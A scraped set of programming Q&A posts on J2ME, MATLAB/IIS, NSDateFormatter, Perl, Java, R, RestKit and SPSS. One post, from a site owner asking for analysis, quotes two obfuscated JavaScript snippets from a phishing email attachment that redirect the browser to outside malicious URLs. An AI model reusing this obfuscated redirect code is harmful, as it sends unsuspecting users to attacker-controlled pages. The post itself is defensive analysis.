    - by proximity
    I have made a scorecard with 5 holes; for each there is an input field (shots), and an image is shown. The input should be saved into a Vector and shown on each hole, e.g. hole 2: enter shots, and underneath it "total shots: 4" (if you made 4 shots on hole 1). At the end I would need a sum of all shots, e.g.:

      Hole 1: 4
      Hole 2: 3
      Hole 3: 2
      ...
      Total: 17

    Could someone please help me with this task?

      {
          f = new Form("Scorecard");
          d = Display.getDisplay(this);
          mTextField = new TextField("Shots:", "", 2, TextField.NUMERIC);
          f.append(mTextField);
          mStatus = new StringItem("Hole 1:", "Par 3, 480m");
          f.append(mStatus);
          try {
              Image j = Image.createImage("/hole1.png");
              ImageItem ii = new ImageItem("", j, 3, "Hole 1");
              f.append(ii);
          } catch (java.io.IOException ioe) {} catch (Exception e) {}
          f.addCommand(mBackCommand);
          f.addCommand(mNextCommand);
          f.addCommand(mExitCommand);
          f.setCommandListener(this);
          Display.getDisplay(this).setCurrent(f);
      }

      public void startApp() {
          mBackCommand = new Command("Back", Command.BACK, 0);
          mNextCommand = new Command("Next", Command.OK, 1);
          mExitCommand = new Command("Exit", Command.EXIT, 2);
      }

      public void pauseApp() { }

      public void destroyApp(boolean unconditional) { }

      public void commandAction(Command c, Displayable d) {
          if (c == mExitCommand) {
              destroyApp(true);
              notifyDestroyed();
          } else if ( c == mNextCommand) {
              // -> go to next hole input! save the mTextField input into a vector.
          }
      }
      }

    Full code:

      import java.util.*;
      import javax.microedition.midlet.*;
      import javax.microedition.lcdui.*;

      public class ScorerMIDlet extends MIDlet implements CommandListener {
          private Command mExitCommand, mBackCommand, mNextCommand;
          private Display d;
          private Form f;
          private TextField mTextField;
          private Alert a;
          private StringItem mHole1;
          private int b;

          // Repeat holeForm for all five holes and add the input into a vector or
          // array. Display the values at the end after asking for today's date, and
          // put today's date at the top of the list. Make it possible to go back in
          // the form, e.g. hole 3 - hole 2 - hole 1.
          public void holeForm(int b) {
              f = new Form("Scorecard");
              d = Display.getDisplay(this);
              mTextField = new TextField("Shots:", "", 2, TextField.NUMERIC);
              f.append(mTextField);
              mHole1 = new StringItem("Hole 1:", "Par 5, 480m");
              f.append(mHole1);
              try {
                  Image j = Image.createImage("/hole1.png");
                  ImageItem ii = new ImageItem("", j, 3, "Hole 1");
                  f.append(ii);
              } catch (java.io.IOException ioe) {} catch (Exception e) {}

              // Set date & time at the end
              long now = System.currentTimeMillis();
              DateField df = new DateField("Playing date:", DateField.DATE_TIME);
              df.setDate(new Date(now));
              f.append(df);

              f.addCommand(mBackCommand);
              f.addCommand(mNextCommand);
              f.addCommand(mExitCommand);
              f.setCommandListener(this);
              Display.getDisplay(this).setCurrent(f);
          }

          public void startApp() {
              mBackCommand = new Command("Back", Command.BACK, 0);
              mNextCommand = new Command("OK-Next", Command.OK, 1);
              mExitCommand = new Command("Exit", Command.EXIT, 2);
              b = 0;
              holeForm(b);
          }

          public void pauseApp() {}

          public void destroyApp(boolean unconditional) {}

          public void commandAction(Command c, Displayable d) {
              if (c == mExitCommand) {
                  destroyApp(true);
                  notifyDestroyed();
              } else if ( c == mNextCommand) {
                  holeForm(b);
              }
          }
      }

  • MATLAB Builder NE crashes the app pool on IIS 7.5

    - by Alkersan
    I'm developing a web user interface for MATLAB functions with ASP.NET. I started by studying the demos and got stuck on the following problem. I created a MyComponent.dll assembly with deploytool from MATLAB 2010a (target framework 3.5). The component has one function, getKnot(), which returns a figure:

      function df = getKnot()
          f = figure('Visible', 'off');
          knot;
          df = webfigure(f);
          close(f);
      end

    Then I made a simple web app in Visual Studio 2008 SP1 with only one page, Default.aspx, and added references to MWArray.dll, WebFiguresService.dll, and MyComponent.dll. The code-behind is:

      using System;
      using System.Web;
      using System.Web.UI;
      using System.Web.UI.WebControls;
      using MyComponent;
      using MathWorks.MATLAB.NET.WebFigures;

      namespace MATLAB_WebApplication
      {
          public partial class _Default : System.Web.UI.Page
          {
              protected void Page_Load(object sender, EventArgs e)
              {
                  var myComponentClass = new MyComponentClass();
                  var x = myComponentClass.getKnot();
                  //WebFigureControl1.WebFigure = new WebFigure();
              }
          }
      }

    When I run this page on Visual Studio's development web server, everything is fine and the figure works. But when I try to deploy the webfigure on my local IIS 7.5, which runs on Win7 x32, the IIS app pool crashes. There is an entry in the System event log: "A process serving application pool 'Classic .NET AppPool' suffered a fatal communication error with the Windows Process Activation Service. The process id was '3676'. The data field contains the error number 6D000780". This happens when MyComponent is instantiated. What could I have forgotten when moving to IIS? Other examples, like the magic square console application, run perfectly, and every MATLAB component instantiates correctly, just not in the IIS environment.

  • Instruments (Leaks) and NSDateFormatter

    - by Cal
    When I run my iPhone app with Instruments Leaks and parse a bunch of NSDates using NSDateFormatter, my memory goes up about 1 MB and stays there, even though these NSDates should be dealloc'd after the parsing (I just discard them if they aren't new). I thought the malloc (in my heaviest stack trace below) could become part of the NSDate, but I also thought it could be memory used only during some intermediate parsing step. Does anyone know which one it is, or how to find out? Also, is there a way to put a breakpoint on NSDate dealloc to see if that memory is really being reclaimed?

    Here's what my date formatter looks like for parsing these dates:

      df = [[NSDateFormatter alloc] init];
      [df setDateFormat:@"EEE, d MMM yyyy H:m:s z"];

    Here's the heaviest stack trace when the memory bumps up and stays there:

      0  libSystem.B.dylib   208.80 Kb  malloc
      1  libicucore.A.dylib  868.19 Kb  icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&)
      2  libicucore.A.dylib  868.66 Kb  icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&)
      3  libicucore.A.dylib  868.67 Kb  icu::ZoneMeta::getSingleCountry(icu::UnicodeString const&, icu::UnicodeString&)
      4  libicucore.A.dylib  868.67 Kb  icu::DateFormatSymbols::initZoneStringFormat()
      5  libicucore.A.dylib  868.67 Kb  icu::DateFormatSymbols::getZoneStringFormat() const
      6  libicucore.A.dylib  868.67 Kb  icu::SimpleDateFormat::subParse(icu::UnicodeString const&, int&, unsigned short, int, signed char, signed char, signed char*, icu::Calendar&) const
      7  libicucore.A.dylib  868.67 Kb  icu::SimpleDateFormat::parse(icu::UnicodeString const&, icu::Calendar&, icu::ParsePosition&) const
      8  libicucore.A.dylib  868.67 Kb  icu::DateFormat::parse(icu::UnicodeString const&, icu::ParsePosition&) const
      9  libicucore.A.dylib  868.67 Kb  udat_parse
      10 CoreFoundation      868.67 Kb  CFDateFormatterGetAbsoluteTimeFromString
      11 CoreFoundation      868.67 Kb  CFDateFormatterCreateDateFromString
      12 Foundation          868.67 Kb  -[NSDateFormatter getObjectValue:forString:range:error:]
      13 Foundation          868.75 Kb  -[NSDateFormatter getObjectValue:forString:errorDescription:]
      14 Foundation          868.75 Kb  -[NSDateFormatter dateFromString:]

    Thanks!

  • What does this JavaScript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:

      Dear Customer, This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions. (C) ourwebsite.com

    (I changed the domain name.) The attached file is an HTML file that contains the following JavaScript:

      <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>

    Another email had this:

      <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

    Can anyone tell me what it does? We want to see if we have a vulnerability, and whether we need to tell our customers about it. Thanks!

  • Perl: how to pretty-print time duration

    - by sds
    How do I pretty-print a time duration in Perl? The only thing I could come up with so far is:

      my $interval = 1351521657387 - 1351515910623; # milliseconds
      my $duration = DateTime::Duration->new(
          seconds     => POSIX::floor($interval/1000),
          nanoseconds => 1000000 * ($interval % 1000),
      );
      my $df = DateTime::Format::Duration->new(
          pattern   => '%Y years, %m months, %e days, '
                     . '%H hours, %M minutes, %S seconds, %N nanoseconds',
          normalize => 1,
      );
      print $df->format_duration($duration);

    which results in:

      0 years, 00 months, 0 days, 01 hours, 35 minutes, 46 seconds, 764000000 nanoseconds

    This is no good for me for the following reasons: I don't want to see "0 years" (it wastes space), but I don't want to remove "%Y years" from the pattern either (what if I do need years next time?). Also, I know in advance that my precision is only milliseconds, so I don't want to see the six trailing zeros in the nanoseconds part. I care about prettiness/compactness/human readability much more than about precision/machine readability; i.e., I want to see something like "1.2 years" or "3.22 months" or "7.88 days" or "5.7 hours" or "75.5 minutes" (or "1.26 hours", whatever looks better to you) or "24.7 seconds" or "133.7 milliseconds", similar to how R prints difftime.

  • Getting a number from the console

    - by Johanna
    Hi, this is my method that is called when I want to get a number from the user, but even when the user enters a valid number, only the "else" branch runs. Why? Please help, thanks.

      public static int chooseTheTypeOfSorting() {
          System.out.println("Enter 0 for merge sorting OR enter 1 for bubble sorting");
          int numberFromConsole = 0;
          try {
              InputStreamReader isr = new InputStreamReader(System.in);
              BufferedReader br = new BufferedReader(isr);
              String s = br.readLine();
              DecimalFormat df = new DecimalFormat();
              Number n = df.parse(s);
              numberFromConsole = n.intValue();
          } catch (ParseException ex) {
              Logger.getLogger(DoublyLinkedList.class.getName()).log(Level.SEVERE, null, ex);
          } catch (IOException ex) {
              Logger.getLogger(DoublyLinkedList.class.getName()).log(Level.SEVERE, null, ex);
          }
          return numberFromConsole;
      }

    and in my main method:

      public static void main(String[] args) {
          int i = 0;
          i = getRandomNumber(10, 10000);
          int p = chooseTheTypeOfSorting();
          DoublyLinkedList list = new DoublyLinkedList();
          for (int j = 0; j < i; j++) {
              list.add(j, getRandomNumber(10, 10000));
              if (p == 0) {
                  //do something....
              }
              if (p == 1) {
                  //do something.....
              } else {
                  System.out.println("write the correct number ");
                  chooseTheTypeOfSorting();
              }

  • Sampling Duplicates

    - by user3640982
    I have a dataset from which I need to sample. It is set up with an ID field and a year field. I want every record from the most current year, and then the most current IDs sampled from every 3rd year going back. The data is ordered by year. For example:

      ID <- rep(1:3, 5)
      Year <- rep(c(1,2,3,4,5), each=3)
      df <- data.frame(ID, Year)

         ID Year
      1   1    1
      2   2    1
      3   3    1
      4   1    2
      5   2    2
      6   3    2
      7   1    3
      8   2    3
      9   3    3
      10  1    4
      11  2    4
      12  3    4
      13  1    5
      14  2    5
      15  3    5

    From this example, I would want to return:

        ID Year
      1  1    1
      2  2    1
      3  3    1
      4  1    4
      5  2    4
      6  3    4

    I'm thinking that some combination of duplicated() and which() should get what I want, but the problem is that duplicated() just tells whether a value has been repeated; it doesn't say which record is being repeated:

      which(duplicated(df$ID))
      [1]  4  5  6  7  8  9 10 11 12 13 14 15

    This is a problem since not every ID exists in every year. Any help would be appreciated. Thanks, Eric

  • Finding the Column Index for a Specific Value

    - by Btibert3
    Hi all, I am having a brain cramp. Below is a toy dataset:

      df <- data.frame(
          id = 1:6,
          v1 = c("a", "a", "c", NA, "g", "h"),
          v2 = c("z", "y", "a", NA, "a", "g"),
          stringsAsFactors=F)

    I have a specific value that I want to find across a set of defined columns, and I want to identify the position it is located in. The fields I am searching are characters, and the trick is that the value I am looking for might not exist. In addition, null strings are also present in the dataset. Assuming I knew how to do this, the variable position indicates the values I would like returned:

      > df
        id   v1   v2 position
      1  1    a    z        1
      2  2    a    y        1
      3  3    c    a        2
      4  4 <NA> <NA>       99
      5  5    g    a        2
      6  6    h    g       99

    The general rule is that I want to find the position of the value "a", and if it is not located, or if v1 is missing, then I want 99 returned. In this instance I am searching across v1 and v2, but in reality I have 10 different variables. It is also worth noting that the value I am searching for can only exist once across the 10 variables. What is the best way to generate this recode? Many thanks in advance.

  • How to parse time stamps with Unicode characters in Java or Perl?

    - by ram
    I'm trying to make my code as generic as possible while parsing the install time of a product installation. The product will contain two files: one has the timestamp I need to parse, and the other tells me the language of the installation. This is how I'm parsing the timestamp:

      public class ts {
          public static void main (String[] args) {
              String installTime = "2009/11/26 \u4e0b\u5348 04:40:54";
              // This timestamp came from the first file. The Unicode characters
              // are some Chinese characters... AM/PM markers, I guess.
              //Locale = new Locale(); // don't set the language yet
              SimpleDateFormat df = (SimpleDateFormat)DateFormat.getDateTimeInstance(DateFormat.DEFAULT, DateFormat.DEFAULT);
              Date instTime = null;
              try {
                  instTime = df.parse(installTime);
              } catch (ParseException e) {
                  // TODO Auto-generated catch block
                  e.printStackTrace();
              }
              System.out.println(instTime.toString());
          }
      }

    The output I get is:

      Parsing Failed
      java.text.ParseException: Unparseable date: "2009/11/26 \u4e0b\u5348 04:40:54"
        at java.text.DateFormat.parse(Unknown Source)
        at ts.main(ts.java:39)
      Exception in thread "main" java.lang.NullPointerException
        at ts.main(ts.java:45)

    It throws an exception, and yet at the end, when I print it, it shows some date, although a wrong one. I would really appreciate it if you could clarify these doubts:

    1. How should timestamps containing Unicode characters be parsed, if this is not the proper way?
    2. If parsing failed, how could instTime hold some (wrong) date?
    3. I know these are Chinese/Korean timestamps, so I set the locale to zh and ko as follows, yet the same error comes again:

      Locale = new Locale("ko");
      Locale = new Locale("ja");
      Locale = new Locale("zh");

    4. How can I do the same thing in Perl? I can't use the Date::Manip package; is there any other way?

  • Get 1 array from 2 arrays (using RestKit 0.20)

    - by Reez
    I'm using RestKit and was wondering how to combine two array's into one array. I already have the data being pulled in separately from API1 and API2, but I don't know how to combine them into 1 tableView. Each API is pulling in media, and I want the combined tableView to show the most recent media (like any standard timeline does these days). I will post any extra code or help as necessary, thanks so much! Below shows API1 + API2 being pulled in correctly, but not combined into the tableView. Only data from API1 shows in the tableView. ViewController.m @interface StackOverflowViewController () @property (strong, nonatomic) NSArray *hArray; @property (strong, nonatomic) NSArray *springs; @property (strong, nonatomic) RKObjectManager *eObjectManager; @property (strong, nonatomic) NSArray *iArray; @property (strong, nonatomic) NSArray *imagesArray; @property (strong, nonatomic) RKObjectManager *iObjectManager; // Wain @property (strong, nonatomic) NSMutableArray *tableDataList; // Laarme @property (nonatomic, strong) NSMutableArray *contentArray; @property (nonatomic, strong) NSDateFormatter *dateFormatter1; // Dan @property (nonatomic, strong) NSMutableArray *combinedModel; @end @implementation StackOverflowViewController @synthesize tableView = _tableView; @synthesize spring; @synthesize leaf; @synthesize theme; @synthesize hArray; @synthesize springs; @synthesize eObjectManager; @synthesize iArray; @synthesize imagesArray; @synthesize iObjectManager; // Wain @synthesize tableDataList; // Laarme @synthesize contentArray; @synthesize dateFormatter1; // Dan @synthesize combinedModel; - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view. [self configureRestKit]; [self loadMediaDan]; [self sortCombinedModel]; } - (void)didReceiveMemoryWarning { [super didReceiveMemoryWarning]; // Dispose of any resources that can be recreated. 
} - (void)configureRestKit { // API1 // initialize AFNetworking HTTPClient NSURL *baseURLE = [NSURL URLWithString:@"https://api.e.com"]; AFHTTPClient *clientE = [[AFHTTPClient alloc] initWithBaseURL:baseURLE]; // initialize RestKit RKObjectManager *eManager = [[RKObjectManager alloc] initWithHTTPClient:clientE]; self.eObjectManager = eManager; // setup object mappings RKObjectMapping *feedMapping = [RKObjectMapping mappingForClass:[Feed class]]; [feedMapping addAttributeMappingsFromArray:@[@"headline", @"premium", @"published", @"description"]]; RKObjectMapping *linksMapping = [RKObjectMapping mappingForClass:[Links class]]; RKObjectMapping *webMapping = [RKObjectMapping mappingForClass:[Web class]]; [webMapping addAttributeMappingsFromArray:@[@"href"]]; RKObjectMapping *mobileMapping = [RKObjectMapping mappingForClass:[Mobile class]]; [mobileMapping addAttributeMappingsFromArray:@[@"href"]]; RKObjectMapping *imagesMapping = [RKObjectMapping mappingForClass:[Images class]]; [imagesMapping addAttributeMappingsFromArray:@[@"height", @"width", @"url"]]; [feedMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"links" toKeyPath:@"links" withMapping:linksMapping]]; [feedMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"images" toKeyPath:@"images" withMapping:imagesMapping]]; [linksMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"web" toKeyPath:@"web" withMapping:webMapping]]; [linksMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"mobile" toKeyPath:@"mobile" withMapping:mobileMapping]]; // register mappings with the provider using a response descriptor RKResponseDescriptor *responseDescriptor = [RKResponseDescriptor responseDescriptorWithMapping:feedMapping method:RKRequestMethodGET pathPattern:nil keyPath:@"feed" statusCodes:[NSIndexSet indexSetWithIndex:200]]; [self.eObjectManager addResponseDescriptor:responseDescriptor]; // API2 // initialize AFNetworking HTTPClient NSURL *baseURLI = [NSURL URLWithString:@"https://api.i.com"]; AFHTTPClient *clientI = [[AFHTTPClient alloc] initWithBaseURL:baseURLI]; // initialize RestKit RKObjectManager *iManager = [[RKObjectManager alloc] initWithHTTPClient:clientI]; self.iObjectManager = iManager; // setup object mappings RKObjectMapping *dataMapping = [RKObjectMapping mappingForClass:[Data class]]; [dataMapping addAttributeMappingsFromArray:@[@"link", @"created_time"]]; RKObjectMapping *imagesMapping = [RKObjectMapping mappingForClass:[ImagesI class]]; [IMapping addAttributeMappingsFromArray:@[@""]]; RKObjectMapping *standardResolutionMapping = [RKObjectMapping mappingForClass:[StandardResolution class]]; [standardResolutionMapping addAttributeMappingsFromArray:@[@"url", @"width", @"height"]]; RKObjectMapping *captionMapping = [RKObjectMapping mappingForClass:[Caption class]]; [captionMapping addAttributeMappingsFromArray:@[@"text", @"created_time"]]; RKObjectMapping *userMapping = [RKObjectMapping mappingForClass:[User class]]; [userMapping addAttributeMappingsFromArray:@[@"username"]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"images" toKeyPath:@"images" withMapping:imagesMapping]]; [imagesMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"standard_resolution" toKeyPath:@"standard_resolution" withMapping:standardResolutionMapping]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"caption" toKeyPath:@"caption" 
withMapping:captionMapping]]; [dataMapping addPropertyMapping:[RKRelationshipMapping relationshipMappingFromKeyPath:@"user" toKeyPath:@"user" withMapping:userMapping]]; // register mappings with the provider using a response descriptor RKResponseDescriptor *responseDescriptor2 = [RKResponseDescriptor responseDescriptorWithMapping:dataMapping method:RKRequestMethodGET pathPattern:nil keyPath:@"data" statusCodes:[NSIndexSet indexSetWithIndex:200]]; [self.iObjectManager addResponseDescriptor:responseDescriptor2]; } - (void)loadMedia { // Laarme contentArray = [[NSMutableArray alloc] init]; [self sortByDates]; // API1 NSString *apikey = @kCLIENTKEY; NSDictionary *queryParams = @{@"apikey" : apikey,}; [self.eObjectManager getObjectsAtPath:[NSString stringWithFormat:@"v1/n/?limit=4&leafs=%@&themes=%@", leafAbbreviation, themeID] // Changed limit to 4 for the time being parameters:queryParams success:^(RKObjectRequestOperation *operation, RKMappingResult *mappingResult) { hArray = mappingResult.array; [self.tableView reloadData]; } failure:^(RKObjectRequestOperation *operation, NSError *error) { NSLog(@"No?: %@", error); }]; // API2 [self.iObjectManager getObjectsAtPath:[NSString stringWithFormat:@"v1/u/2/m/recent/?client_id=e999"] parameters:nil success:^(RKObjectRequestOperation *operation, RKMappingResult *mappingResult) { iArray = mappingResult.array; [self.tableView reloadData]; } failure:^(RKObjectRequestOperation *operation, NSError *error) { NSLog(@"No: %@", error); }]; } // Laarme - (void)sortByDates { NSDateFormatter *dateFormatter2 = [[NSDateFormatter alloc] init]; //Do the dateFormatter settings, you may have to use 2 NSDateFormatters if the format is different for Data & Feed //The initialization of the dateFormatter is done before the block, because its alloc/init take some time, and you may have to declare it with "__block" //Since in your edit you do that and it seems it's the same format, just do @property (nonatomic, strong) NSDateFormatter dateFormatter; NSArray *sortedArray = [contentArray sortedArrayUsingComparator:^NSComparisonResult(id a, id b) { // Added Curly Braces around if else statements and used feedObject NSDate *aDate, *bDate; Feed *feedObject = (Feed *)a; Data *dataObject = (Data *)b; if ([a isKindOfClass:[Feed class]]) { //Feed *feedObject = (Feed *)a; aDate = [dateFormatter1 dateFromString:feedObject.published];} else { //if ([a isKindOfClass:[Data class]]) aDate = [dateFormatter2 dateFromString:dataObject.created_time];} if ([b isKindOfClass:[Feed class]]) { bDate = [dateFormatter1 dateFromString:feedObject.published];} else {//if ([b isKindOfClass:[Data class]]) bDate = [dateFormatter2 dateFromString:dataObject.created_time];} return [aDate compare:bDate]; }]; } #pragma mark - Table View - (NSInteger)numberOfSectionsInTableView:(UITableView *)tableView { return 1; } - (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section { // API1 //return hArray.count; // API2 //return iArray.count; // API1 + API2 return hArray.count + iArray.count; } - (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath { UITableViewCell *cell; if(indexPath.row < hArray.count) { // Date Change NSDateFormatter *df = [[NSDateFormatter alloc] init]; [df setDateFormat:@"MMMM d, yyyy h:mma"]; // API 1 TableViewCell *api1Cell = [tableView dequeueReusableCellWithIdentifier:@"YourAPI1Cell"]; // Do everything you need to do with the api1Cell // Use the index in 'indexPath.row' to get the object from you array // API1 
Feed *feedLocal = [hArray objectAtIndex:indexPath.row]; // API1 NSString *dateString = [self timeSincePublished:feedLocal.published]; NSString *headlineText = [NSString stringWithFormat:@"%@", feedLocal.headline]; NSString *descriptionText = [NSString stringWithFormat:@"%@", feedLocal.description]; NSString *premiumText = [NSString stringWithFormat:@"%@", feedLocal.premium]; api1Cell.labelHeadline.text = [NSString stringWithFormat:@"%@", headlineText]; api1Cell.labelPublished.text = dateString; api1Cell.labelDescription.text = descriptionText; // SDWebImage API1 if ([feedLocal.images count] == 0) { // Not sure anything needed here } else { Images *imageLocal = [feedLocal.images objectAtIndex:0]; NSString *imageURL = [NSString stringWithFormat:@"%@", imageLocal.url]; NSString *imageWith = [NSString stringWithFormat:@"%@", imageLocal.width]; NSString *imageHeight = [NSString stringWithFormat:@"%@", imageLocal.height]; __weak UITableViewCell *wcell = cell; [cell.imageView setImageWithURL:[NSURL URLWithString:imageURL] placeholderImage:[UIImage imageNamed:@"X"] completed:^(UIImage *image, NSError *error, SDImageCacheType cacheType) { // Something }]; } cell = api1Cell; } else { // Date Change NSDateFormatter *df = [[NSDateFormatter alloc] init]; [df setDateFormat:@"MMMM d, yyyy h:mma"]; // API 2 MRWebListTableViewCellTwo *api2Cell = [tableView dequeueReusableCellWithIdentifier:@"YourAPI2Cell"]; // Do everything you need to do with the api2Cell // Remember to use 'indexPath.row - hArray.count' as the index for getting an object for your second array // API 2 Data *dataLocal = [iArray objectAtIndex:indexPath.row - hArray.count]; // API 2 NSString *dateStringI = [self timeSincePublished:dataLocal.created_time]; NSString *captionTextI = [NSString stringWithFormat:@"%@", dataLocal.caption.text]; NSString *usernameI = [NSString stringWithFormat:@"%@", dataLocal.user.username]; api2Cell.labelHeadline.text = usernameI; api2Cell.labelDescription.text = captionTextI; api2Cell.labelPublished.text = dateStringI; // SDWebImage API 2 if ([dataLocal.images count] == 0) { NSLog(@"Images Count: %lu", (unsigned long)dataLocal.images.count); // Not sure anything needed here } else { ImagesI *imageLocalI = [dataLocal.images objectAtIndex:0]; StandardResolutionI *standardResolutionLocal = [imageLocalI.standard_resolution objectAtIndex:0]; NSString *imageURLI = [NSString stringWithFormat:@"%@", standardResolutionLocal.url]; NSString *imageWithI = [NSString stringWithFormat:@"%@", standardResolutionLocal.width]; NSString *imageHeightI = [NSString stringWithFormat:@"%@", standardResolutionLocal.height]; // 11.2 __weak UITableViewCell *wcell = cell; [cell.imageView setImageWithURL:[NSURL URLWithString:imageURLI] placeholderImage:[UIImage imageNamed:@"X"] completed:^(UIImage *image, NSError *error, SDImageCacheType cacheType) { // Something }]; } cell = api2Cell; } return cell; } Feed.h @property (nonatomic, strong) Links *links; @property (nonatomic, strong) NSString *headline; @property (nonatomic, strong) NSString *source; @property (nonatomic, strong) NSDate *published; @property (nonatomic, strong) NSString *description; @property (nonatomic, strong) NSString *premium; @property (nonatomic, strong) NSArray *images; Data.h @property (nonatomic, strong) NSString *link; @property (nonatomic, strong) NSDate *created_time; @property (nonatomic, strong) UserI *user; @property (nonatomic, strong) NSArray *images; @property (nonatomic, strong) CaptionI *caption;

  • SPSS: sums of squares change radically with slight model changes in ANOVA

    - by Pat
    I have noticed that the sums of squares in my models can change fairly radically with even the slightest adjustment to the model. Is this normal? I'm using SPSS 16, and both models presented below used the same data and variables, with only one small change: categorizing one of the variables as either a 2-level or a 3-level variable.

    Details: using a 2 x 2 x 6 mixed-model ANOVA, with the 6 being the repeated measure, I get the following in the between-groups analysis:

      ------------------------------------------------------------
      Source    | Type III SS | df | MS      | F      | Sig
      ------------------------------------------------------------
      intercept | 4086.46     | 1  | 4086.46 | 104.93 | .000
      X         | 224.61      | 1  | 224.61  | 5.77   | .019
      Y         | 2.60        | 1  | 2.60    | .07    | .80
      X by Y    | 19.25       | 1  | 19.25   | .49    | .49
      Error     | 2570.40     | 66 | 38.95   |        |

    Then, when I use the exact same data but a slightly different model, in which variable Y has 3 levels instead of 2, I get the following:

      ------------------------------------------------------------
      Source    | Type III SS | df | MS      | F      | Sig
      ------------------------------------------------------------
      intercept | 3603.88     | 1  | 3603.88 | 90.89  | .000
      X         | 171.89      | 1  | 171.89  | 4.34   | .041
      Y         | 19.23       | 2  | 9.62    | .24    | .79
      X by Y    | 17.90       | 2  | 17.90   | .80    | .80
      Error     | 2537.76     | 64 | 39.65   |        |

    I don't understand why variable X would have a different sum of squares simply because variable Y gets divided up into 3 levels instead of 2. This is also the case in the within-groups analysis. Please help me understand :D Thank you in advance, Pat
